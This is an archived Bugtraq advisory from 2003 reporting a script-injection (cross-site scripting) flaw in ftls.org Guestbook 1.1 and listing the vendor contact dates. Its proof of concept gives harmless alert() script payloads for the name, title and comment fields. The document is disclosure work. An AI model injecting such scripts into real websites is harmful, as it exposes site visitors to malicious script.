[28626] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

ftls.org Guestbook 1.1 Script Injection

daemon@ATHENA.MIT.EDU (BrainRawt .)
Sat Jan 25 05:03:46 2003

From: "BrainRawt ." <brainrawt@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sat, 25 Jan 2003 01:14:34 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F141ixjnzi95HfqR77b00000317@hotmail.com>


ftls.org  Guestbook 1.1 Script Injection Vulnerabilities
Discovered By BrainRawt (brainrawt@hotmail.com)

About MyGuestbook:
------------------
Your basic guestbook that can be downloaded at
http://www.ftls.org/en/examples/cgi/Guestbook.shtml#s1.

Vulnerable (tested) Versions:
--------------------
guestbook v 1.1

Vendor Contact:
----------------
  9-27-02 - Emailed webmaster@ftls.org
12-15-02 - Emailed tyndiuk@ftls.org

Vulnerability:
----------------
guestbook.cgi inproperly filters user input making the guestbook
vulnerable to script injection.

Exploit (POC):
----------------
When filling in ones name use:
<script>alert('your_name_field_vuln_to_injection')</script>

When filling in the Title use:
<script>alert('title_field_vuln_to_injection')</script>

When filling in the Comment use:
<script>alert('comments_field_vuln')</script>

---------------------------------------------------------------------
Which looks better?  Blackhat or White? You Decide! - BrainRawt




_________________________________________________________________
Protect your PC - get McAfee.com VirusScan Online  
http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[28626] in bugtraq

ftls.org Guestbook 1.1 Script Injection

daemon@ATHENA.MIT.EDU (BrainRawt .)Sat Jan 25 05:03:46 2003

daemon@ATHENA.MIT.EDU (BrainRawt .)
Sat Jan 25 05:03:46 2003